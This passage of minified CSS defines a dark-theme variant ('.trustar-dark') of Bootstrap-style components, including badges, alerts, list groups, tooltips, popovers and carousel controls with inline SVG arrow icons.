.page-item:last-child .page-link{border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.trustar-dark .page-item.active .page-link{z-index:1;color:#fff;background-color:#007bff;border-color:#007bff}.trustar-dark .page-item.disabled .page-link{color:#6c757d;pointer-events:none;cursor:auto;background-color:#fff;border-color:#dee2e6}.trustar-dark .pagination-lg .page-link{padding:.75rem 1.5rem;font-size:1.25rem;line-height:1.5}.trustar-dark .pagination-lg .page-item:first-child .page-link{border-top-left-radius:.3rem;border-bottom-left-radius:.3rem}.trustar-dark .pagination-lg .page-item:last-child .page-link{border-top-right-radius:.3rem;border-bottom-right-radius:.3rem}.trustar-dark .pagination-sm .page-link{padding:.25rem .5rem;font-size:.875rem;line-height:1.5}.trustar-dark .pagination-sm .page-item:first-child .page-link{border-top-left-radius:.2rem;border-bottom-left-radius:.2rem}.trustar-dark .pagination-sm .page-item:last-child .page-link{border-top-right-radius:.2rem;border-bottom-right-radius:.2rem}.trustar-dark .badge{display:inline-block;padding:.25em .4em;font-size:75%;font-weight:700;line-height:1;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.25rem}a.trustar-dark .badge:hover,a.trustar-dark .badge:focus{text-decoration:none}.trustar-dark .badge:empty{display:none}.trustar-dark .btn .badge{position:relative;top:-1px}.trustar-dark .badge-pill{padding-right:.6em;padding-left:.6em;border-radius:10rem}.trustar-dark .badge-primary{color:#fff;background-color:#3568d5}a.trustar-dark .badge-primary:hover,a.trustar-dark .badge-primary:focus{color:#fff;background-color:#2552b2}.trustar-dark .badge-secondary{color:#212529;background-color:#ff9a6f}a.trustar-dark .badge-secondary:hover,a.trustar-dark .badge-secondary:focus{color:#212529;background-color:#ff763c}.trustar-dark .badge-success{color:#fff;background-color:#28a745}a.trustar-dark .badge-success:hover,a.trustar-dark .badge-success:focus{color:#fff;background-color:#1e7e34}.trustar-dark .badge-info{color:#fff;background-color:#17a2b8}a.trustar-dark .badge-info:hover,a.trustar-dark .badge-info:focus{color:#fff;background-color:#117a8b}.trustar-dark .badge-warning{color:#212529;background-color:#ffc107}a.trustar-dark .badge-warning:hover,a.trustar-dark .badge-warning:focus{color:#212529;background-color:#d39e00}.trustar-dark .badge-danger{color:#fff;background-color:#dc3545}a.trustar-dark .badge-danger:hover,a.trustar-dark .badge-danger:focus{color:#fff;background-color:#bd2130}.trustar-dark .badge-light{color:#212529;background-color:#eaecf1}a.trustar-dark .badge-light:hover,a.trustar-dark .badge-light:focus{color:#212529;background-color:#cbd0dd}.trustar-dark .badge-dark{color:#fff;background-color:#44546a}a.trustar-dark .badge-dark:hover,a.trustar-dark .badge-dark:focus{color:#fff;background-color:#303b4b}.trustar-dark .badge-brand-primary{color:#fff;background-color:#3568d5}a.trustar-dark .badge-brand-primary:hover,a.trustar-dark .badge-brand-primary:focus{color:#fff;background-color:#2552b2}.trustar-dark .badge-brand-secondary{color:#212529;background-color:#ff9a6f}a.trustar-dark .badge-brand-secondary:hover,a.trustar-dark .badge-brand-secondary:focus{color:#212529;background-color:#ff763c}.trustar-dark .badge-functional-success{color:#fff;background-color:#417505}a.trustar-dark .badge-functional-success:hover,a.trustar-dark .badge-functional-success:focus{color:#fff;background-color:#264403}.trustar-dark .badge-functional-info{color:#fff;background-color:#4a90e2}a.trustar-dark .badge-functional-info:hover,a.trustar-dark .badge-functional-info:focus{color:#fff;background-color:#2275d7}.trustar-dark .badge-functional-warning{color:#212529;background-color:#f5a623}a.trustar-dark .badge-functional-warning:hover,a.trustar-dark .badge-functional-warning:focus{color:#212529;background-color:#db8c0a}.trustar-dark .badge-functional-danger{color:#fff;background-color:#d0021b}a.trustar-dark .badge-functional-danger:hover,a.trustar-dark .badge-functional-danger:focus{color:#fff;background-color:#9d0214}.trustar-dark .badge-functional-accept{color:#212529;background-color:#fff}a.trustar-dark .badge-functional-accept:hover,a.trustar-dark .badge-functional-accept:focus{color:#212529;background-color:#e6e6e6}.trustar-dark .badge-functional-decline{color:#212529;background-color:#fff}a.trustar-dark .badge-functional-decline:hover,a.trustar-dark .badge-functional-decline:focus{color:#212529;background-color:#e6e6e6}.trustar-dark .badge-operational-critical{color:#212529;background-color:#fff}a.trustar-dark .badge-operational-critical:hover,a.trustar-dark .badge-operational-critical:focus{color:#212529;background-color:#e6e6e6}.trustar-dark .badge-operational-error{color:#212529;background-color:#fff}a.trustar-dark .badge-operational-error:hover,a.trustar-dark .badge-operational-error:focus{color:#212529;background-color:#e6e6e6}.trustar-dark .badge-operational-warning{color:#212529;background-color:#fff}a.trustar-dark .badge-operational-warning:hover,a.trustar-dark .badge-operational-warning:focus{color:#212529;background-color:#e6e6e6}.trustar-dark .badge-operational-info{color:#212529;background-color:#fff}a.trustar-dark .badge-operational-info:hover,a.trustar-dark .badge-operational-info:focus{color:#212529;background-color:#e6e6e6}.trustar-dark .jumbotron{padding:2rem 1rem;margin-bottom:2rem;background-color:#e9ecef;border-radius:.3rem}@media (min-width: 576px){.trustar-dark .jumbotron{padding:4rem 2rem}}.trustar-dark .jumbotron-fluid{padding-right:0;padding-left:0;border-radius:0}.trustar-dark .alert{position:relative;padding:.75rem 1.25rem;margin-bottom:1rem;border:1px solid transparent;border-radius:.25rem}.trustar-dark .alert-heading{color:inherit}.trustar-dark .alert-link{font-weight:700}.trustar-dark .alert-dismissible{padding-right:4rem}.trustar-dark .alert-dismissible .close{position:absolute;top:0;right:0;padding:.75rem 1.25rem;color:inherit}.trustar-dark .alert-primary{color:#1c366f;background-color:#d7e1f7;border-color:#c6d5f3}.trustar-dark .alert-primary hr{border-top-color:#b1c5ef}.trustar-dark .alert-primary .alert-link{color:#122246}.trustar-dark .alert-secondary{color:#85503a;background-color:#ffebe2;border-color:#ffe3d7}.trustar-dark .alert-secondary hr{border-top-color:#ffd1be}.trustar-dark .alert-secondary .alert-link{color:#613b2b}.trustar-dark .alert-success{color:#155724;background-color:#d4edda;border-color:#c3e6cb}.trustar-dark .alert-success hr{border-top-color:#b1dfbb}.trustar-dark .alert-success .alert-link{color:#0b2e13}.trustar-dark .alert-info{color:#0c5460;background-color:#d1ecf1;border-color:#bee5eb}.trustar-dark .alert-info hr{border-top-color:#abdde5}.trustar-dark .alert-info .alert-link{color:#062c33}.trustar-dark .alert-warning{color:#856404;background-color:#fff3cd;border-color:#ffeeba}.trustar-dark .alert-warning hr{border-top-color:#ffe8a1}.trustar-dark .alert-warning .alert-link{color:#533f03}.trustar-dark .alert-danger{color:#721c24;background-color:#f8d7da;border-color:#f5c6cb}.trustar-dark .alert-danger hr{border-top-color:#f1b0b7}.trustar-dark .alert-danger .alert-link{color:#491217}.trustar-dark .alert-light{color:#7a7b7d;background-color:#fbfbfc;border-color:#f9fafb}.trustar-dark .alert-light hr{border-top-color:#eaedf1}.trustar-dark .alert-light .alert-link{color:#616263}.trustar-dark .alert-dark{color:#232c37;background-color:#dadde1;border-color:#cbcfd5}.trustar-dark .alert-dark hr{border-top-color:#bdc2ca}.trustar-dark .alert-dark .alert-link{color:#0f1318}.trustar-dark .alert-brand-primary{color:#1c366f;background-color:#d7e1f7;border-color:#c6d5f3}.trustar-dark .alert-brand-primary hr{border-top-color:#b1c5ef}.trustar-dark .alert-brand-primary .alert-link{color:#122246}.trustar-dark .alert-brand-secondary{color:#85503a;background-color:#ffebe2;border-color:#ffe3d7}.trustar-dark .alert-brand-secondary hr{border-top-color:#ffd1be}.trustar-dark .alert-brand-secondary .alert-link{color:#613b2b}.trustar-dark .alert-functional-success{color:#223d03;background-color:#d9e3cd;border-color:#cad8b9}.trustar-dark .alert-functional-success hr{border-top-color:#becfa9}.trustar-dark .alert-functional-success .alert-link{color:#070c01}.trustar-dark .alert-functional-info{color:#264b76;background-color:#dbe9f9;border-color:#cce0f7}.trustar-dark .alert-functional-info hr{border-top-color:#b6d3f4}.trustar-dark .alert-functional-info .alert-link{color:#1a324f}.trustar-dark .alert-functional-warning{color:#7f5612;background-color:#fdedd3;border-color:#fce6c1}.trustar-dark .alert-functional-warning hr{border-top-color:#fbdca9}.trustar-dark .alert-functional-warning .alert-link{color:#52380c}.trustar-dark .alert-functional-danger{color:#6c010e;background-color:#f6ccd1;border-color:#f2b8bf}.trustar-dark .alert-functional-danger hr{border-top-color:#eea2ac}.trustar-dark .alert-functional-danger .alert-link{color:#390107}.trustar-dark .alert-functional-accept{color:#858585;background-color:#fff;border-color:#fff}.trustar-dark .alert-functional-accept hr{border-top-color:#f2f2f2}.trustar-dark .alert-functional-accept .alert-link{color:#6c6c6c}.trustar-dark .alert-functional-decline{color:#858585;background-color:#fff;border-color:#fff}.trustar-dark .alert-functional-decline hr{border-top-color:#f2f2f2}.trustar-dark .alert-functional-decline .alert-link{color:#6c6c6c}.trustar-dark .alert-operational-critical{color:#858585;background-color:#fff;border-color:#fff}.trustar-dark .alert-operational-critical hr{border-top-color:#f2f2f2}.trustar-dark .alert-operational-critical .alert-link{color:#6c6c6c}.trustar-dark .alert-operational-error{color:#858585;background-color:#fff;border-color:#fff}.trustar-dark .alert-operational-error hr{border-top-color:#f2f2f2}.trustar-dark .alert-operational-error .alert-link{color:#6c6c6c}.trustar-dark .alert-operational-warning{color:#858585;background-color:#fff;border-color:#fff}.trustar-dark .alert-operational-warning hr{border-top-color:#f2f2f2}.trustar-dark .alert-operational-warning .alert-link{color:#6c6c6c}.trustar-dark .alert-operational-info{color:#858585;background-color:#fff;border-color:#fff}.trustar-dark .alert-operational-info hr{border-top-color:#f2f2f2}.trustar-dark .alert-operational-info .alert-link{color:#6c6c6c}@-webkit-keyframes progress-bar-stripes{from{background-position:1rem 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:1rem 0}to{background-position:0 0}}.trustar-dark .progress{display:flex;height:1rem;overflow:hidden;font-size:.75rem;background-color:#e9ecef;border-radius:.25rem}.trustar-dark .progress-bar{display:flex;flex-direction:column;justify-content:center;color:#fff;text-align:center;white-space:nowrap;background-color:#007bff;transition:width 0.6s ease}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .progress-bar{transition:none}}.trustar-dark .progress-bar-striped{background-image:linear-gradient(45deg, rgba(255,255,255,0.15) 25%, transparent 25%, transparent 50%, rgba(255,255,255,0.15) 50%, rgba(255,255,255,0.15) 75%, transparent 75%, transparent);background-size:1rem 1rem}.trustar-dark .progress-bar-animated{-webkit-animation:progress-bar-stripes 1s linear infinite;animation:progress-bar-stripes 1s linear infinite}.trustar-dark .media{display:flex;align-items:flex-start}.trustar-dark .media-body{flex:1}.trustar-dark .list-group{display:flex;flex-direction:column;padding-left:0;margin-bottom:0}.trustar-dark .list-group-item-action{width:100%;color:#495057;text-align:inherit}.trustar-dark .list-group-item-action:hover,.trustar-dark .list-group-item-action:focus{color:#495057;text-decoration:none;background-color:#f8f9fa}.trustar-dark .list-group-item-action:active{color:#212529;background-color:#e9ecef}.trustar-dark .list-group-item{position:relative;display:block;padding:.75rem 1.25rem;margin-bottom:-1px;background-color:#fff;border:1px solid rgba(0,0,0,0.125)}.trustar-dark .list-group-item:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.trustar-dark .list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.trustar-dark .list-group-item:hover,.trustar-dark .list-group-item:focus{z-index:1;text-decoration:none}.trustar-dark .list-group-item.disabled,.trustar-dark .list-group-item:disabled{color:#6c757d;pointer-events:none;background-color:#fff}.trustar-dark .list-group-item.active{z-index:2;color:#fff;background-color:#007bff;border-color:#007bff}.trustar-dark .list-group-flush .list-group-item{border-right:0;border-left:0;border-radius:0}.trustar-dark .list-group-flush .list-group-item:last-child{margin-bottom:-1px}.trustar-dark .list-group-flush:first-child .list-group-item:first-child{border-top:0}.trustar-dark .list-group-flush:last-child .list-group-item:last-child{margin-bottom:0;border-bottom:0}.trustar-dark .list-group-item-primary{color:#1c366f;background-color:#c6d5f3}.trustar-dark .list-group-item-primary.list-group-item-action:hover,.trustar-dark .list-group-item-primary.list-group-item-action:focus{color:#1c366f;background-color:#b1c5ef}.trustar-dark .list-group-item-primary.list-group-item-action.active{color:#fff;background-color:#1c366f;border-color:#1c366f}.trustar-dark .list-group-item-secondary{color:#85503a;background-color:#ffe3d7}.trustar-dark .list-group-item-secondary.list-group-item-action:hover,.trustar-dark .list-group-item-secondary.list-group-item-action:focus{color:#85503a;background-color:#ffd1be}.trustar-dark .list-group-item-secondary.list-group-item-action.active{color:#fff;background-color:#85503a;border-color:#85503a}.trustar-dark .list-group-item-success{color:#155724;background-color:#c3e6cb}.trustar-dark .list-group-item-success.list-group-item-action:hover,.trustar-dark .list-group-item-success.list-group-item-action:focus{color:#155724;background-color:#b1dfbb}.trustar-dark .list-group-item-success.list-group-item-action.active{color:#fff;background-color:#155724;border-color:#155724}.trustar-dark .list-group-item-info{color:#0c5460;background-color:#bee5eb}.trustar-dark .list-group-item-info.list-group-item-action:hover,.trustar-dark .list-group-item-info.list-group-item-action:focus{color:#0c5460;background-color:#abdde5}.trustar-dark .list-group-item-info.list-group-item-action.active{color:#fff;background-color:#0c5460;border-color:#0c5460}.trustar-dark .list-group-item-warning{color:#856404;background-color:#ffeeba}.trustar-dark .list-group-item-warning.list-group-item-action:hover,.trustar-dark .list-group-item-warning.list-group-item-action:focus{color:#856404;background-color:#ffe8a1}.trustar-dark .list-group-item-warning.list-group-item-action.active{color:#fff;background-color:#856404;border-color:#856404}.trustar-dark .list-group-item-danger{color:#721c24;background-color:#f5c6cb}.trustar-dark .list-group-item-danger.list-group-item-action:hover,.trustar-dark .list-group-item-danger.list-group-item-action:focus{color:#721c24;background-color:#f1b0b7}.trustar-dark .list-group-item-danger.list-group-item-action.active{color:#fff;background-color:#721c24;border-color:#721c24}.trustar-dark .list-group-item-light{color:#7a7b7d;background-color:#f9fafb}.trustar-dark .list-group-item-light.list-group-item-action:hover,.trustar-dark .list-group-item-light.list-group-item-action:focus{color:#7a7b7d;background-color:#eaedf1}.trustar-dark .list-group-item-light.list-group-item-action.active{color:#fff;background-color:#7a7b7d;border-color:#7a7b7d}.trustar-dark .list-group-item-dark{color:#232c37;background-color:#cbcfd5}.trustar-dark .list-group-item-dark.list-group-item-action:hover,.trustar-dark .list-group-item-dark.list-group-item-action:focus{color:#232c37;background-color:#bdc2ca}.trustar-dark .list-group-item-dark.list-group-item-action.active{color:#fff;background-color:#232c37;border-color:#232c37}.trustar-dark .list-group-item-brand-primary{color:#1c366f;background-color:#c6d5f3}.trustar-dark .list-group-item-brand-primary.list-group-item-action:hover,.trustar-dark .list-group-item-brand-primary.list-group-item-action:focus{color:#1c366f;background-color:#b1c5ef}.trustar-dark .list-group-item-brand-primary.list-group-item-action.active{color:#fff;background-color:#1c366f;border-color:#1c366f}.trustar-dark .list-group-item-brand-secondary{color:#85503a;background-color:#ffe3d7}.trustar-dark .list-group-item-brand-secondary.list-group-item-action:hover,.trustar-dark .list-group-item-brand-secondary.list-group-item-action:focus{color:#85503a;background-color:#ffd1be}.trustar-dark .list-group-item-brand-secondary.list-group-item-action.active{color:#fff;background-color:#85503a;border-color:#85503a}.trustar-dark .list-group-item-functional-success{color:#223d03;background-color:#cad8b9}.trustar-dark .list-group-item-functional-success.list-group-item-action:hover,.trustar-dark .list-group-item-functional-success.list-group-item-action:focus{color:#223d03;background-color:#becfa9}.trustar-dark .list-group-item-functional-success.list-group-item-action.active{color:#fff;background-color:#223d03;border-color:#223d03}.trustar-dark .list-group-item-functional-info{color:#264b76;background-color:#cce0f7}.trustar-dark .list-group-item-functional-info.list-group-item-action:hover,.trustar-dark .list-group-item-functional-info.list-group-item-action:focus{color:#264b76;background-color:#b6d3f4}.trustar-dark .list-group-item-functional-info.list-group-item-action.active{color:#fff;background-color:#264b76;border-color:#264b76}.trustar-dark .list-group-item-functional-warning{color:#7f5612;background-color:#fce6c1}.trustar-dark .list-group-item-functional-warning.list-group-item-action:hover,.trustar-dark .list-group-item-functional-warning.list-group-item-action:focus{color:#7f5612;background-color:#fbdca9}.trustar-dark .list-group-item-functional-warning.list-group-item-action.active{color:#fff;background-color:#7f5612;border-color:#7f5612}.trustar-dark .list-group-item-functional-danger{color:#6c010e;background-color:#f2b8bf}.trustar-dark .list-group-item-functional-danger.list-group-item-action:hover,.trustar-dark .list-group-item-functional-danger.list-group-item-action:focus{color:#6c010e;background-color:#eea2ac}.trustar-dark .list-group-item-functional-danger.list-group-item-action.active{color:#fff;background-color:#6c010e;border-color:#6c010e}.trustar-dark .list-group-item-functional-accept{color:#858585;background-color:#fff}.trustar-dark .list-group-item-functional-accept.list-group-item-action:hover,.trustar-dark .list-group-item-functional-accept.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar-dark .list-group-item-functional-accept.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar-dark .list-group-item-functional-decline{color:#858585;background-color:#fff}.trustar-dark .list-group-item-functional-decline.list-group-item-action:hover,.trustar-dark .list-group-item-functional-decline.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar-dark .list-group-item-functional-decline.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar-dark .list-group-item-operational-critical{color:#858585;background-color:#fff}.trustar-dark .list-group-item-operational-critical.list-group-item-action:hover,.trustar-dark .list-group-item-operational-critical.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar-dark .list-group-item-operational-critical.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar-dark .list-group-item-operational-error{color:#858585;background-color:#fff}.trustar-dark .list-group-item-operational-error.list-group-item-action:hover,.trustar-dark .list-group-item-operational-error.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar-dark .list-group-item-operational-error.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar-dark .list-group-item-operational-warning{color:#858585;background-color:#fff}.trustar-dark .list-group-item-operational-warning.list-group-item-action:hover,.trustar-dark .list-group-item-operational-warning.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar-dark .list-group-item-operational-warning.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar-dark .list-group-item-operational-info{color:#858585;background-color:#fff}.trustar-dark .list-group-item-operational-info.list-group-item-action:hover,.trustar-dark .list-group-item-operational-info.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar-dark .list-group-item-operational-info.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar-dark .close{float:right;font-size:1.5rem;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.5}.trustar-dark .close:hover{color:#000;text-decoration:none}.trustar-dark .close:not(:disabled):not(.disabled){cursor:pointer}.trustar-dark .close:not(:disabled):not(.disabled):hover,.trustar-dark .close:not(:disabled):not(.disabled):focus{opacity:.75}.trustar-dark button.close{padding:0;background-color:transparent;border:0;-webkit-appearance:none;-moz-appearance:none;appearance:none}.trustar-dark a.close.disabled{pointer-events:none}.trustar-dark .tooltip{position:absolute;z-index:1070;display:block;margin:0;font-family:-apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,\"Helvetica Neue\",Arial,\"Noto Sans\",sans-serif,\"Apple Color Emoji\",\"Segoe UI Emoji\",\"Segoe UI Symbol\",\"Noto Color Emoji\";font-style:normal;font-weight:400;line-height:1.5;text-align:left}[dir=\"ltr\"] .trustar-dark .tooltip{text-align:left}[dir=\"rtl\"] .trustar-dark .tooltip{text-align:right}.trustar-dark .tooltip{text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.875rem;word-wrap:break-word;opacity:0}.trustar-dark .tooltip.show{opacity:.9}.trustar-dark .tooltip .arrow{position:absolute;display:block;width:.8rem;height:.4rem}.trustar-dark .tooltip .arrow::before{position:absolute;content:\"\";border-color:transparent;border-style:solid}.trustar-dark .bs-tooltip-top,.trustar-dark .bs-tooltip-auto[x-placement^=\"top\"]{padding:.4rem 0}.trustar-dark .bs-tooltip-top .arrow,.trustar-dark .bs-tooltip-auto[x-placement^=\"top\"] .arrow{bottom:0}.trustar-dark .bs-tooltip-top .arrow::before,.trustar-dark .bs-tooltip-auto[x-placement^=\"top\"] .arrow::before{top:0;border-width:.4rem .4rem 0;border-top-color:#000}.trustar-dark .bs-tooltip-right,.trustar-dark .bs-tooltip-auto[x-placement^=\"right\"]{padding:0 .4rem}.trustar-dark .bs-tooltip-right .arrow,.trustar-dark .bs-tooltip-auto[x-placement^=\"right\"] .arrow{left:0;width:.4rem;height:.8rem}.trustar-dark .bs-tooltip-right .arrow::before,.trustar-dark .bs-tooltip-auto[x-placement^=\"right\"] .arrow::before{right:0;border-width:.4rem .4rem .4rem 0;border-right-color:#000}.trustar-dark .bs-tooltip-bottom,.trustar-dark .bs-tooltip-auto[x-placement^=\"bottom\"]{padding:.4rem 0}.trustar-dark .bs-tooltip-bottom .arrow,.trustar-dark .bs-tooltip-auto[x-placement^=\"bottom\"] .arrow{top:0}.trustar-dark .bs-tooltip-bottom .arrow::before,.trustar-dark .bs-tooltip-auto[x-placement^=\"bottom\"] .arrow::before{bottom:0;border-width:0 .4rem .4rem;border-bottom-color:#000}.trustar-dark .bs-tooltip-left,.trustar-dark .bs-tooltip-auto[x-placement^=\"left\"]{padding:0 .4rem}.trustar-dark .bs-tooltip-left .arrow,.trustar-dark .bs-tooltip-auto[x-placement^=\"left\"] .arrow{right:0;width:.4rem;height:.8rem}.trustar-dark .bs-tooltip-left .arrow::before,.trustar-dark .bs-tooltip-auto[x-placement^=\"left\"] .arrow::before{left:0;border-width:.4rem 0 .4rem .4rem;border-left-color:#000}.trustar-dark .tooltip-inner{max-width:200px;padding:.25rem .5rem;color:#fff;text-align:center;background-color:#000;border-radius:.25rem}.trustar-dark .popover{position:absolute;top:0;left:0;z-index:1060;display:block;max-width:276px;font-family:-apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,\"Helvetica Neue\",Arial,\"Noto Sans\",sans-serif,\"Apple Color Emoji\",\"Segoe UI Emoji\",\"Segoe UI Symbol\",\"Noto Color Emoji\";font-style:normal;font-weight:400;line-height:1.5;text-align:left}[dir=\"ltr\"] .trustar-dark .popover{text-align:left}[dir=\"rtl\"] .trustar-dark .popover{text-align:right}.trustar-dark .popover{text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.875rem;word-wrap:break-word;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,0.2);border-radius:.3rem}.trustar-dark .popover .arrow{position:absolute;display:block;width:1rem;height:.5rem;margin:0 .3rem}.trustar-dark .popover .arrow::before,.trustar-dark .popover .arrow::after{position:absolute;display:block;content:\"\";border-color:transparent;border-style:solid}.trustar-dark .bs-popover-top,.trustar-dark .bs-popover-auto[x-placement^=\"top\"]{margin-bottom:.5rem}.trustar-dark .bs-popover-top .arrow,.trustar-dark .bs-popover-auto[x-placement^=\"top\"] .arrow{bottom:calc((.5rem + 1px) * -1)}.trustar-dark .bs-popover-top .arrow::before,.trustar-dark .bs-popover-auto[x-placement^=\"top\"] .arrow::before,.trustar-dark .bs-popover-top .arrow::after,.trustar-dark .bs-popover-auto[x-placement^=\"top\"] .arrow::after{border-width:.5rem .5rem 0}.trustar-dark .bs-popover-top .arrow::before,.trustar-dark .bs-popover-auto[x-placement^=\"top\"] .arrow::before{bottom:0;border-top-color:rgba(0,0,0,0.25)}.trustar-dark .bs-popover-top .arrow::after,.trustar-dark .bs-popover-auto[x-placement^=\"top\"] .arrow::after{bottom:1px;border-top-color:#fff}.trustar-dark .bs-popover-right,.trustar-dark .bs-popover-auto[x-placement^=\"right\"]{margin-left:.5rem}.trustar-dark .bs-popover-right .arrow,.trustar-dark .bs-popover-auto[x-placement^=\"right\"] .arrow{left:calc((.5rem + 1px) * -1);width:.5rem;height:1rem;margin:.3rem 0}.trustar-dark .bs-popover-right .arrow::before,.trustar-dark .bs-popover-auto[x-placement^=\"right\"] .arrow::before,.trustar-dark .bs-popover-right .arrow::after,.trustar-dark .bs-popover-auto[x-placement^=\"right\"] .arrow::after{border-width:.5rem .5rem .5rem 0}.trustar-dark .bs-popover-right .arrow::before,.trustar-dark .bs-popover-auto[x-placement^=\"right\"] .arrow::before{left:0;border-right-color:rgba(0,0,0,0.25)}.trustar-dark .bs-popover-right .arrow::after,.trustar-dark .bs-popover-auto[x-placement^=\"right\"] .arrow::after{left:1px;border-right-color:#fff}.trustar-dark .bs-popover-bottom,.trustar-dark .bs-popover-auto[x-placement^=\"bottom\"]{margin-top:.5rem}.trustar-dark .bs-popover-bottom .arrow,.trustar-dark .bs-popover-auto[x-placement^=\"bottom\"] .arrow{top:calc((.5rem + 1px) * -1)}.trustar-dark .bs-popover-bottom .arrow::before,.trustar-dark .bs-popover-auto[x-placement^=\"bottom\"] .arrow::before,.trustar-dark .bs-popover-bottom .arrow::after,.trustar-dark .bs-popover-auto[x-placement^=\"bottom\"] .arrow::after{border-width:0 .5rem .5rem .5rem}.trustar-dark .bs-popover-bottom .arrow::before,.trustar-dark .bs-popover-auto[x-placement^=\"bottom\"] .arrow::before{top:0;border-bottom-color:rgba(0,0,0,0.25)}.trustar-dark .bs-popover-bottom .arrow::after,.trustar-dark .bs-popover-auto[x-placement^=\"bottom\"] .arrow::after{top:1px;border-bottom-color:#fff}.trustar-dark .bs-popover-bottom .popover-header::before,.trustar-dark .bs-popover-auto[x-placement^=\"bottom\"] .popover-header::before{position:absolute;top:0;left:50%;display:block;width:1rem;margin-left:-.5rem;content:\"\";border-bottom:1px solid #f7f7f7}.trustar-dark .bs-popover-left,.trustar-dark .bs-popover-auto[x-placement^=\"left\"]{margin-right:.5rem}.trustar-dark .bs-popover-left .arrow,.trustar-dark .bs-popover-auto[x-placement^=\"left\"] .arrow{right:calc((.5rem + 1px) * -1);width:.5rem;height:1rem;margin:.3rem 0}.trustar-dark .bs-popover-left .arrow::before,.trustar-dark .bs-popover-auto[x-placement^=\"left\"] .arrow::before,.trustar-dark .bs-popover-left .arrow::after,.trustar-dark .bs-popover-auto[x-placement^=\"left\"] .arrow::after{border-width:.5rem 0 .5rem .5rem}.trustar-dark .bs-popover-left .arrow::before,.trustar-dark .bs-popover-auto[x-placement^=\"left\"] .arrow::before{right:0;border-left-color:rgba(0,0,0,0.25)}.trustar-dark .bs-popover-left .arrow::after,.trustar-dark .bs-popover-auto[x-placement^=\"left\"] .arrow::after{right:1px;border-left-color:#fff}.trustar-dark .popover-header{padding:.5rem .75rem;margin-bottom:0;font-size:1rem;color:inherit;background-color:#f7f7f7;border-bottom:1px solid #ebebeb;border-top-left-radius:calc(.3rem - 1px);border-top-right-radius:calc(.3rem - 1px)}.trustar-dark .popover-header:empty{display:none}.trustar-dark .popover-body{padding:.5rem .75rem;color:#212529}.trustar-dark .carousel{position:relative}.trustar-dark .carousel.pointer-event{touch-action:pan-y}.trustar-dark .carousel-inner{position:relative;width:100%;overflow:hidden}.trustar-dark .carousel-inner::after{display:block;clear:both;content:\"\"}.trustar-dark .carousel-item{position:relative;display:none;float:left;width:100%;margin-right:-100%;-webkit-backface-visibility:hidden;backface-visibility:hidden;transition:-webkit-transform .6s ease-in-out;transition:transform .6s ease-in-out;transition:transform .6s ease-in-out, -webkit-transform .6s ease-in-out}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .carousel-item{transition:none}}.trustar-dark .carousel-item.active,.trustar-dark .carousel-item-next,.trustar-dark .carousel-item-prev{display:block}.trustar-dark .carousel-item-next:not(.carousel-item-left),.trustar-dark .active.carousel-item-right{-webkit-transform:translateX(100%);transform:translateX(100%)}.trustar-dark .carousel-item-prev:not(.carousel-item-right),.trustar-dark .active.carousel-item-left{-webkit-transform:translateX(-100%);transform:translateX(-100%)}.trustar-dark .carousel-fade .carousel-item{opacity:0;transition-property:opacity;-webkit-transform:none;transform:none}.trustar-dark .carousel-fade .carousel-item.active,.trustar-dark .carousel-fade .carousel-item-next.carousel-item-left,.trustar-dark .carousel-fade .carousel-item-prev.carousel-item-right{z-index:1;opacity:1}.trustar-dark .carousel-fade .active.carousel-item-left,.trustar-dark .carousel-fade .active.carousel-item-right{z-index:0;opacity:0;transition:0s .6s opacity}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .carousel-fade .active.carousel-item-left,.trustar-dark .carousel-fade .active.carousel-item-right{transition:none}}.trustar-dark .carousel-control-prev,.trustar-dark .carousel-control-next{position:absolute;top:0;bottom:0;z-index:1;display:flex;align-items:center;justify-content:center;width:15%;color:#fff;text-align:center;opacity:.5;transition:opacity 0.15s ease}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .carousel-control-prev,.trustar-dark .carousel-control-next{transition:none}}.trustar-dark .carousel-control-prev:hover,.trustar-dark .carousel-control-prev:focus,.trustar-dark .carousel-control-next:hover,.trustar-dark .carousel-control-next:focus{color:#fff;text-decoration:none;outline:0;opacity:.9}.trustar-dark .carousel-control-prev{left:0}.trustar-dark .carousel-control-next{right:0}.trustar-dark .carousel-control-prev-icon,.trustar-dark .carousel-control-next-icon{display:inline-block;width:20px;height:20px;background:transparent no-repeat center center;background-size:100% 100%}.trustar-dark .carousel-control-prev-icon{background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23fff' viewBox='0 0 8 8'%3e%3cpath d='M5.25 0l-4 4 4 4 1.5-1.5-2.5-2.5 2.5-2.5-1.5-1.5z'/%3e%3c/svg%3e\")}.trustar-dark .carousel-control-next-icon{background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23fff' viewBox='0 0 8 8'%3e%3cpath d='M2.75 0l-1.5 1.5 2.5 2.5-2.5 2.5 1.5 1.5 